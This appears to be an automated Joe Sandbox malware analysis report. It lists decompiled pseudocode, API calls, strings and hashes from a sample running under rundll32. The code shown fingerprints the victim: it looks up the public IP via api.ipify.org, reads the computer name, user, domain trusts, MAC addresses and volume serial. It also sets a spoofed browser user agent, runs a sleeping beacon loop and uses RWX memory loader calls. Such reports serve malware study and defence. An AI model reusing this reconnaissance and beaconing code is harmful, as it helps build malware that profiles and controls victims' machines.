                                            • Instruction Fuzzy Hash: 45312BB6A40209AFDB10CFA4CC85FEE77B8AB58705F10855CF615E6280E771EA54CB61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 182 1c2520-1c2535 183 1c254d-1c255d call 1c1fe0 182->183 184 1c2537-1c254b lstrcpyA 182->184 187 1c2562-1c2568 183->187 186 1c25aa-1c25ad 184->186 188 1c258a-1c25a8 lstrcpyA 187->188 189 1c256a-1c2588 lstrcpyA 187->189 188->186 189->186
                                            C-Code - Quality: 100%
                                            			E001C2520(void* __ecx, CHAR* _a4) {
                                            				char _v8;
                                            				void* _t10;
                                            
                                            				if( *0x001C7280 == 0) {
                                            					_t10 = E001C1FE0("http://api.ipify.org", "84.17.52.3", 0x20,  &_v8); // executed
                                            					if(_t10 != 1) {
                                            						 *((char*)(0x1c7280)) = 0;
                                            						lstrcpyA(_a4, "0.0.0.0");
                                            						return 0;
                                            					}
                                            					 *((char*)(_v8 + 0x1c7280)) = 0;
                                            					lstrcpyA(_a4, "84.17.52.3");
                                            					return 1;
                                            				}
                                            				lstrcpyA(_a4, "84.17.52.3");
                                            				return 1;
                                            			}






                                            APIs
                                            • lstrcpyA.KERNEL32(001C1AD9,84.17.52.3,?,?,001C1AD9,?,?), ref: 001C2540
                                            • lstrcpyA.KERNEL32(001C1AD9,84.17.52.3,?,?,001C1AD9,?,?), ref: 001C257D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1c0000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy
                                            • String ID: 0.0.0.0$84.17.52.3$http://api.ipify.org
                                            • API String ID: 3722407311-2520019587
                                            • Opcode ID: 4d059f63c87c3cb4ef06b33742bb5d0c985da9231121c23d9c511440710c4adc
                                            • Instruction ID: f712e9514d5ffd67d73ced4951a3157414db787eeebc29b5f69f39df19453965
                                            • Opcode Fuzzy Hash: 4d059f63c87c3cb4ef06b33742bb5d0c985da9231121c23d9c511440710c4adc
                                            • Instruction Fuzzy Hash: 1B01D63974C200ABD7148BA8CC2AFEABBA8EB25700F14415CF5048B2C1C7F6E9808BD1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 230 1c30f0-1c3122 GetComputerNameA 231 1c3124-1c312f lstrcatA 230->231 232 1c3135-1c3155 lstrcatA call 1c2df0 230->232 231->232 235 1c3168-1c3170 232->235 236 1c3157-1c3162 lstrcatA 232->236 236->235
                                            C-Code - Quality: 100%
                                            			E001C30F0(CHAR* _a4) {
                                            				long _v8;
                                            				char _v268;
                                            				char _v528;
                                            				int _t14;
                                            				void* _t16;
                                            
                                            				 *_a4 = 0;
                                            				_v8 = 0x104;
                                            				_t14 = GetComputerNameA( &_v268,  &_v8); // executed
                                            				_t31 = _t14;
                                            				if(_t14 != 0) {
                                            					lstrcatA(_a4,  &_v268);
                                            				}
                                            				lstrcatA(_a4, " @ ");
                                            				_t16 = E001C2DF0(_t31,  &_v528); // executed
                                            				if(_t16 != 0) {
                                            					lstrcatA(_a4,  &_v528);
                                            				}
                                            				return 1;
                                            			}









                                            APIs
                                            • GetComputerNameA.KERNEL32(?,00000104), ref: 001C311A
                                            • lstrcatA.KERNEL32(00100000,?), ref: 001C312F
                                            • lstrcatA.KERNEL32(00100000, @ ), ref: 001C313E
                                            • lstrcatA.KERNEL32(00100000,?), ref: 001C3162
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1c0000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$ComputerName
                                            • String ID: @
                                            • API String ID: 2583549208-203157567
                                            • Opcode ID: 26b0cfcbf7b94adb9400ab3bd9d65154ac5876889380a7a1bee6d9f943edbb70
                                            • Instruction ID: 526a075a412d84abd70cc0223be8c17d10722798cc5943e1599fc09ca7563fc9
                                            • Opcode Fuzzy Hash: 26b0cfcbf7b94adb9400ab3bd9d65154ac5876889380a7a1bee6d9f943edbb70
                                            • Instruction Fuzzy Hash: 620181B5504308ABDB14DFA4DC58FDA7B7CAB58300F108198FA4A87251EB75DB84CB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 237 1c23c0-1c23e9 DsEnumerateDomainTrustsA 238 1c23eb-1c23ed 237->238 239 1c23f2-1c23f6 237->239 242 1c2487-1c248a 238->242 240 1c23f8-1c23fd 239->240 241 1c2402-1c2409 239->241 240->242 243 1c2414-1c241a 241->243 244 1c241c-1c2427 243->244 245 1c2482 243->245 246 1c244d-1c2459 244->246 247 1c2429-1c2447 lstrcatA * 2 244->247 245->242 248 1c245b-1c247a lstrcatA * 2 246->248 249 1c2480 246->249 247->246 248->249 249->243
                                            C-Code - Quality: 75%
                                            			E001C23C0(CHAR* _a4) {
                                            				signed int _v8;
                                            				char _v12;
                                            				char _v16;
                                            				char* _t30;
                                            
                                            				 *_a4 = 0;
                                            				_t30 =  &_v16;
                                            				__imp__DsEnumerateDomainTrustsA(0, 0x3f,  &_v12, _t30); // executed
                                            				if(_t30 == 0) {
                                            					if(_v16 != 0) {
                                            						_v8 = 0;
                                            						while(_v8 < _v16) {
                                            							if( *(_v12 + _v8 * 0x2c) != 0) {
                                            								lstrcatA(_a4,  *(_v12 + _v8 * 0x2c));
                                            								lstrcatA(_a4, ";");
                                            							}
                                            							if( *((intOrPtr*)(_v12 + 4 + _v8 * 0x2c)) != 0) {
                                            								_t26 = 4 + _v8 * 0x2c; // 0xff25f845
                                            								lstrcatA(_a4,  *(_v12 + _t26));
                                            								lstrcatA(_a4, ";");
                                            							}
                                            							_v8 = _v8 + 1;
                                            						}
                                            						return 1;
                                            					}
                                            					return 1;
                                            				}
                                            				return 0;
                                            			}








                                            APIs
                                            • DsEnumerateDomainTrustsA.NETAPI32(00000000,0000003F,001C1AE8,?,?,001C1AE8,?,?,?), ref: 001C23E1
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1c0000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: DomainEnumerateTrusts
                                            • String ID:
                                            • API String ID: 4051863571-0
                                            • Opcode ID: 0095fa9e7bd8991b3e408f06944e9fbbbfb23bd8d9da6889937bcaa491935c07
                                            • Instruction ID: 4e1fa7cc69ca3e15a623cc362806a9de04a1248d5038469e6f07cfb1deb59aa3
                                            • Opcode Fuzzy Hash: 0095fa9e7bd8991b3e408f06944e9fbbbfb23bd8d9da6889937bcaa491935c07
                                            • Instruction Fuzzy Hash: 46211D35A04209EBCB1CCF98D995FEDBB75EB54304F20819CE5069B291C774EA81DB94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 251 1c2df0-1c2e4a call 1c2e90 call 1c3000 256 1c2e4c-1c2e82 lstrcpyA lstrcatA * 2 251->256 257 1c2e84 251->257 258 1c2e86-1c2e89 256->258 257->258
                                            C-Code - Quality: 100%
                                            			E001C2DF0(void* __eflags, CHAR* _a4) {
                                            				long _v8;
                                            				long _v12;
                                            				long _v16;
                                            				char _v276;
                                            				char _v536;
                                            				long _t16;
                                            				void* _t20;
                                            
                                            				_t16 = E001C2E90("explorer.exe"); // executed
                                            				_v16 = _t16;
                                            				_v12 = 0x104;
                                            				_v8 = 0x104;
                                            				 *_a4 = 0;
                                            				_t20 = E001C3000(_v16,  &_v536, _v12,  &_v276, _v8); // executed
                                            				if(_t20 == 0) {
                                            					return 0;
                                            				}
                                            				lstrcpyA(_a4,  &_v276);
                                            				lstrcatA(_a4, "\\");
                                            				lstrcatA(_a4,  &_v536);
                                            				return 1;
                                            			}











                                            APIs
                                              • Part of subcall function 001C2E90: K32EnumProcesses.KERNEL32(?,00001000,001C2E03), ref: 001C2EAD
                                              • Part of subcall function 001C3000: OpenProcess.KERNEL32(00000400,00000000,?,?,001C2E45,?,?,00000104,?,00000104), ref: 001C3011
                                            • lstrcpyA.KERNEL32(00000104,?), ref: 001C2E57
                                            • lstrcatA.KERNEL32(00000104,001C42B8), ref: 001C2E66
                                            • lstrcatA.KERNEL32(00000104,?), ref: 001C2E77
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1c0000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$EnumOpenProcessProcesseslstrcpy
                                            • String ID: explorer.exe
                                            • API String ID: 1774016706-3187896405
                                            • Opcode ID: 608faca6047f9e603af5ee1d219b506ec0554aba1ff2097f610e7ea190438551
                                            • Instruction ID: 034611d0a09a39d9d857b45ddfdecd747b6a7248b9e5c81f09243060c86f299d
                                            • Opcode Fuzzy Hash: 608faca6047f9e603af5ee1d219b506ec0554aba1ff2097f610e7ea190438551
                                            • Instruction Fuzzy Hash: 5D1156B590420CABCB14DFA8DD55FDE7BB8EB58300F004198FA09D7241E775DA84CBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 259 1c2f30-1c2f51 OpenProcess 260 1c2feb 259->260 261 1c2f57-1c2f7d K32GetProcessImageFileNameA CloseHandle 259->261 263 1c2fed-1c2ff0 260->263 261->260 262 1c2f7f-1c2f8d 261->262 264 1c2f98-1c2f9e 262->264 265 1c2fd0-1c2fd4 264->265 266 1c2fa0-1c2fae 264->266 265->260 269 1c2fd6-1c2fe9 lstrcpyA 265->269 267 1c2fbd-1c2fca 266->267 268 1c2fb0-1c2fba 266->268 270 1c2fcc 267->270 271 1c2fce 267->271 268->267 269->263 270->265 271->264
                                            C-Code - Quality: 85%
                                            			E001C2F30(long _a4, CHAR* _a8) {
                                            				int _v8;
                                            				void* _v12;
                                            				CHAR* _v16;
                                            				void* _v20;
                                            				char _v280;
                                            				void* _t29;
                                            				void* _t48;
                                            
                                            				_t29 = OpenProcess(0x400, 0, _a4);
                                            				_v12 = _t29;
                                            				if(_v12 == 0) {
                                            					L12:
                                            					return 0;
                                            				}
                                            				_push(0x104);
                                            				_push( &_v280);
                                            				_push(_v12); // executed
                                            				L001C3BE3(); // executed
                                            				_v20 = _t29;
                                            				CloseHandle(_v12); // executed
                                            				if(_v20 <= 0) {
                                            					goto L12;
                                            				}
                                            				_v16 = 0;
                                            				_v8 = 0;
                                            				while(_v8 < _v20) {
                                            					if( *((char*)(_t48 + _v8 - 0x114)) == 0x5c) {
                                            						_v16 = _t48 + _v8 - 0x113;
                                            					}
                                            					if( *((char*)(_t48 + _v8 - 0x114)) != 0) {
                                            						_v8 = _v8 + 1;
                                            						continue;
                                            					} else {
                                            						break;
                                            					}
                                            				}
                                            				if(_v16 == 0) {
                                            					goto L12;
                                            				}
                                            				lstrcpyA(_a8, _v16);
                                            				return 1;
                                            			}











                                            APIs
                                            • OpenProcess.KERNEL32(00000400,00000000,001C2E03), ref: 001C2F44
                                            • K32GetProcessImageFileNameA.KERNEL32 ref: 001C2F67
                                            • CloseHandle.KERNEL32(00000000), ref: 001C2F73
                                            • lstrcpyA.KERNEL32(00000000,00000000), ref: 001C2FDE
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1c0000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Process$CloseFileHandleImageNameOpenlstrcpy
                                            • String ID:
                                            • API String ID: 2420205050-0
                                            • Opcode ID: 65f6384c8f9cd3959720469abb51e0a436c65dd81da861903c183bce68152913
                                            • Instruction ID: 3f82080e1d48546e013153043a2b6e9b15929caff99caa71309158ea93e8703c
                                            • Opcode Fuzzy Hash: 65f6384c8f9cd3959720469abb51e0a436c65dd81da861903c183bce68152913
                                            • Instruction Fuzzy Hash: C3214774A0410CEBDB18CF98C994FEEBBB5BB54700F20819DE625A7280C7749E84DF51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 68%
                                            			E00181968() {
                                            				void* _t11;
                                            				signed int _t13;
                                            				intOrPtr _t19;
                                            				void* _t20;
                                            				intOrPtr _t23;
                                            
                                            				_push(_t23);
                                            				_push(E00181A1E);
                                            				_push( *[fs:edx]);
                                            				 *[fs:edx] = _t23;
                                            				_push(0x1945c4);
                                            				L001812BC();
                                            				if( *0x194045 != 0) {
                                            					_push(0x1945c4);
                                            					L001812C4();
                                            				}
                                            				E0018132C(0x1945e4);
                                            				E0018132C(0x1945f4);
                                            				E0018132C(0x194620);
                                            				_t11 = LocalAlloc(0, 0xff8); // executed
                                            				 *0x19461c = _t11;
                                            				if( *0x19461c != 0) {
                                            					_t13 = 3;
                                            					do {
                                            						_t20 =  *0x19461c; // 0x3d76a8
                                            						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
                                            						_t13 = _t13 + 1;
                                            					} while (_t13 != 0x401);
                                            					 *((intOrPtr*)(0x194608)) = 0x194604;
                                            					 *0x194604 = 0x194604;
                                            					 *0x194610 = 0x194604;
                                            					 *0x1945bc = 1;
                                            				}
                                            				_pop(_t19);
                                            				 *[fs:eax] = _t19;
                                            				_push(E00181A25);
                                            				if( *0x194045 != 0) {
                                            					_push(0x1945c4);
                                            					L001812CC();
                                            					return 0;
                                            				}
                                            				return 0;
                                            			}









                                            APIs
                                            • RtlInitializeCriticalSection.KERNEL32(001945C4,00000000,00181A1E,?,?,00182202,00194604,00000000,00000000,?,?,00181BF1,00181C06,00181D57), ref: 0018197E
                                            • RtlEnterCriticalSection.KERNEL32(001945C4,001945C4,00000000,00181A1E,?,?,00182202,00194604,00000000,00000000,?,?,00181BF1,00181C06,00181D57), ref: 00181991
                                            • LocalAlloc.KERNEL32(00000000,00000FF8,001945C4,00000000,00181A1E,?,?,00182202,00194604,00000000,00000000,?,?,00181BF1,00181C06,00181D57), ref: 001819BB
                                            • RtlLeaveCriticalSection.KERNEL32(001945C4,00181A25,00000000,00181A1E,?,?,00182202,00194604,00000000,00000000,?,?,00181BF1,00181C06,00181D57), ref: 00181A18
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                            • String ID:
                                            • API String ID: 730355536-0
                                            • Opcode ID: 7f1abc3bb1ddd624ab0e1614ded573c340d0865780d464b505f60df5479fe45b
                                            • Instruction ID: 7a37b573b4de41935e19b492fe47cb9a695c510caabbaa9d94d942947106cf90
                                            • Opcode Fuzzy Hash: 7f1abc3bb1ddd624ab0e1614ded573c340d0865780d464b505f60df5479fe45b
                                            • Instruction Fuzzy Hash: 5801D6F1E042407FE725BBA99816F697BD9E71A701F01412AF100D79D1C7B44A83CF15
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 83%
                                            			E001C2E90(CHAR* _a4) {
                                            				signed int _v8;
                                            				unsigned int _v12;
                                            				unsigned int _v16;
                                            				char _v276;
                                            				char _v4372;
                                            				signed int _t23;
                                            				void* _t26;
                                            				int _t29;
                                            				void* _t40;
                                            				void* _t41;
                                            
                                            				E001C1420(0x1110);
                                            				_t23 =  &_v12;
                                            				_push(_t23);
                                            				_push(0x1000);
                                            				_push( &_v4372); // executed
                                            				L001C3BDD(); // executed
                                            				if(_t23 != 0) {
                                            					_v16 = _v12 >> 2;
                                            					_v8 = 0;
                                            					while(_v8 < _v16) {
                                            						_t26 = E001C2F30( *((intOrPtr*)(_t40 + _v8 * 4 - 0x1110)),  &_v276); // executed
                                            						_t41 = _t41 + 8;
                                            						if(_t26 == 0) {
                                            							L8:
                                            							_t23 = _v8 + 1;
                                            							_v8 = _t23;
                                            							continue;
                                            						}
                                            						_t29 = lstrcmpiA( &_v276, _a4); // executed
                                            						if(_t29 != 0) {
                                            							goto L8;
                                            						}
                                            						return  *((intOrPtr*)(_t40 + _v8 * 4 - 0x1110));
                                            					}
                                            					return _t23 | 0xffffffff;
                                            				}
                                            				return _t23 | 0xffffffff;
                                            			}














                                            APIs
                                            • K32EnumProcesses.KERNEL32(?,00001000,001C2E03), ref: 001C2EAD
                                            • lstrcmpi.KERNEL32(?,001C2E03,?,?,001C2E03), ref: 001C2F07
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1c0000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: EnumProcesseslstrcmpi
                                            • String ID: .>ov
                                            • API String ID: 1246086236-341798122
                                            • Opcode ID: 4d06710059a131988859e1944e8a0b2cccde372f460a5891b70500b2f9a04a71
                                            • Instruction ID: 87e1d2d55ba5d907bf308ead2f183d619278a26e9a3106d2de414bb5d259db59
                                            • Opcode Fuzzy Hash: 4d06710059a131988859e1944e8a0b2cccde372f460a5891b70500b2f9a04a71
                                            • Instruction Fuzzy Hash: 35112A7090010CABCB18DA98D841FEDB3B8BF69344F20469DFA2593280E730EE809B11
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 71%
                                            			E001C1C70(void* __eflags) {
                                            				intOrPtr _v8;
                                            				char _v12;
                                            				intOrPtr _v16;
                                            				intOrPtr _v20;
                                            				signed int _v24;
                                            				signed int _v28;
                                            				signed int _v32;
                                            				signed int _v36;
                                            				intOrPtr _v40;
                                            				intOrPtr _v44;
                                            				intOrPtr _t33;
                                            				intOrPtr _t34;
                                            				intOrPtr _t36;
                                            				void* _t61;
                                            				void* _t62;
                                            
                                            				asm("xorps xmm0, xmm0");
                                            				asm("movlpd [ebp-0x18], xmm0");
                                            				_v12 = 0x8000;
                                            				_t33 = E001C1390(_v12); // executed
                                            				_t62 = _t61 + 4;
                                            				_v16 = _t33;
                                            				_v8 = _v16;
                                            				_t34 = _v8;
                                            				__imp__GetAdaptersAddresses(2, 0, 0, _t34,  &_v12); // executed
                                            				_v20 = _t34;
                                            				if(_v20 == 0) {
                                            					while(_v8 != 0) {
                                            						E001C14A0( &_v36, 0, 8);
                                            						E001C1450( &_v36, _v8 + 0x2c,  *((intOrPtr*)(_v8 + 0x34)));
                                            						_t62 = _t62 + 0x18;
                                            						_v28 = _v28 ^ _v36;
                                            						_v24 = _v24 ^ _v32;
                                            						_v8 =  *((intOrPtr*)(_v8 + 8));
                                            					}
                                            				}
                                            				E001C13D0(_v16);
                                            				_t36 = E001C2490(); // executed
                                            				_v44 = _t36;
                                            				_v40 = 0;
                                            				return E001C1400(_v44, 0x20, _v40) ^ _v28;
                                            			}



















                                            APIs
                                              • Part of subcall function 001C1390: GetProcessHeap.KERNEL32(?,001C1886,00100000), ref: 001C139C
                                              • Part of subcall function 001C1390: RtlAllocateHeap.NTDLL(00390000,00000000,001C1886,?,001C1886,00100000), ref: 001C13BD
                                            • GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,?,00008000), ref: 001C1CA8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1c0000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AdaptersAddressesAllocateProcess
                                            • String ID: Mj<p
                                            • API String ID: 2964925633-780933577
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E001C24F0() {
                                            				void* _t1;
                                            				void* _t2;
                                            
                                            				if( *0x1c7270 == 0) {
                                            					_t2 = InternetOpenA("Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko", 0, 0, 0, 0); // executed
                                            					 *0x1c7270 = _t2;
                                            				}
                                            				_t1 =  *0x1c7270; // 0xcc0004
                                            				return _t1;
                                            			}






                                            APIs
                                            • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko,00000000,00000000,00000000,00000000), ref: 001C2509
                                            Strings
                                            • Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko, xrefs: 001C2504
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1c0000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: InternetOpen
                                            • String ID: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            • API String ID: 2038078732-3333256863
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 000C6DBB
                                            • VirtualProtect.KERNEL32(?,?,00000000), ref: 000C6F62
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150581095.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_c0000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Virtual$AllocProtect
                                            • String ID:
                                            • API String ID: 2447062925-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                              • Part of subcall function 00181968: RtlInitializeCriticalSection.KERNEL32(001945C4,00000000,00181A1E,?,?,00182202,00194604,00000000,00000000,?,?,00181BF1,00181C06,00181D57), ref: 0018197E
                                              • Part of subcall function 00181968: RtlEnterCriticalSection.KERNEL32(001945C4,001945C4,00000000,00181A1E,?,?,00182202,00194604,00000000,00000000,?,?,00181BF1,00181C06,00181D57), ref: 00181991
                                              • Part of subcall function 00181968: LocalAlloc.KERNEL32(00000000,00000FF8,001945C4,00000000,00181A1E,?,?,00182202,00194604,00000000,00000000,?,?,00181BF1,00181C06,00181D57), ref: 001819BB
                                              • Part of subcall function 00181968: RtlLeaveCriticalSection.KERNEL32(001945C4,00181A25,00000000,00181A1E,?,?,00182202,00194604,00000000,00000000,?,?,00181BF1,00181C06,00181D57), ref: 00181A18
                                            • RtlEnterCriticalSection.KERNEL32(001945C4,00000000,001821D0), ref: 0018209F
                                            • RtlLeaveCriticalSection.KERNEL32(001945C4,001821D7), ref: 001821CA
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                            • String ID:
                                            • API String ID: 2227675388-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • LoadLibraryExA.KERNEL32(?,00000000,00000000), ref: 000C6B7B
                                            • GetProcAddress.KERNEL32(?,?), ref: 000C6BDA
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150581095.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_c0000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AddressLibraryLoadProc
                                            • String ID:
                                            • API String ID: 2574300362-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 000C68A4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150581095.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_c0000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID: VirtualAlloc
                                            • API String ID: 4275171209-164498762
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E001C2490() {
                                            				int _v8;
                                            				long _v12;
                                            				char _v272;
                                            				int _t13;
                                            				void* _t18;
                                            
                                            				_v8 = GetWindowsDirectoryA( &_v272, 0x104);
                                            				if(_v8 == 0) {
                                            					L3:
                                            					return 0;
                                            				}
                                            				 *((char*)(_t18 + 0xfffffffffffffef7)) = 0;
                                            				_t13 = GetVolumeInformationA( &_v272, 0, 0,  &_v12, 0, 0, 0, 0); // executed
                                            				if(_t13 == 0) {
                                            					goto L3;
                                            				}
                                            				return _v12;
                                            			}









                                            APIs
                                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 001C24A5
                                            • GetVolumeInformationA.KERNEL32 ref: 001C24DB
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1c0000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: DirectoryInformationVolumeWindows
                                            • String ID:
                                            • API String ID: 3487004747-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 82%
                                            			E001C1870(void* __eflags) {
                                            				intOrPtr _v8;
                                            				long _v12;
                                            				intOrPtr _v16;
                                            				intOrPtr _v20;
                                            				intOrPtr _v24;
                                            				char _v28;
                                            				intOrPtr _v32;
                                            				char _v36;
                                            				intOrPtr _t28;
                                            				intOrPtr _t29;
                                            				intOrPtr _t30;
                                            				void* _t32;
                                            				intOrPtr _t35;
                                            				void* _t38;
                                            				void* _t40;
                                            				void* _t52;
                                            				void* _t55;
                                            
                                            				_v12 = 0x100000;
                                            				_t28 = E001C1390(_v12); // executed
                                            				_v20 = _t28;
                                            				_t29 = E001C1390(_v12); // executed
                                            				_v24 = _t29;
                                            				_t30 = E001C1390(0x1000); // executed
                                            				_t55 = _t52 + 0xc;
                                            				_v8 = _t30;
                                            				_v32 = 1;
                                            				while(1) {
                                            					_t58 = _v32 - 1;
                                            					if(_v32 != 1) {
                                            						break;
                                            					}
                                            					_t32 = E001C1AA0( &_v36, _t58, _v20, _v12,  &_v36); // executed
                                            					_t55 = _t55 + 0xc;
                                            					if(_t32 != 1) {
                                            						L12:
                                            						Sleep(0xea60); // executed
                                            						_t30 = E001C15C0(); // executed
                                            						Sleep(0xea60); // executed
                                            						continue;
                                            					}
                                            					_t35 = E001C1560(_v20 + 4, _v24);
                                            					_t55 = _t55 + 8;
                                            					_v36 = _t35;
                                            					_v16 = _v24;
                                            					while(1 != 0) {
                                            						_v16 = E001C17B0(_v16, _v16, _v8);
                                            						_t38 = E001C27B0(_v16, _v8);
                                            						_t55 = _t55 + 0xc;
                                            						if(_t38 == 1) {
                                            							_v28 = 0;
                                            							_t46 = _v8;
                                            							_t40 = E001C1630(_v8, _v8,  &_v28); // executed
                                            							_t55 = _t55 + 8;
                                            							if(_t40 == 1 && _v28 == 0) {
                                            								E001C14E0(_t46, _v8);
                                            								_t55 = _t55 + 4;
                                            							}
                                            						}
                                            						if(_v16 != 0) {
                                            							continue;
                                            						} else {
                                            							goto L12;
                                            						}
                                            					}
                                            					goto L12;
                                            				}
                                            				return _t30;
                                            			}





















                                            APIs
                                              • Part of subcall function 001C1390: GetProcessHeap.KERNEL32(?,001C1886,00100000), ref: 001C139C
                                              • Part of subcall function 001C1390: RtlAllocateHeap.NTDLL(00390000,00000000,001C1886,?,001C1886,00100000), ref: 001C13BD
                                              • Part of subcall function 001C1AA0: GetVersion.KERNEL32(?,001C18CD,?,00100000,?), ref: 001C1AAD
                                              • Part of subcall function 001C1AA0: wsprintfA.USER32 ref: 001C1B5E
                                            • Sleep.KERNEL32(0000EA60), ref: 001C195F
                                            • Sleep.KERNEL32(0000EA60), ref: 001C196F
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1c0000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: HeapSleep$AllocateProcessVersionwsprintf
                                            • String ID:
                                            • API String ID: 1739176888-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
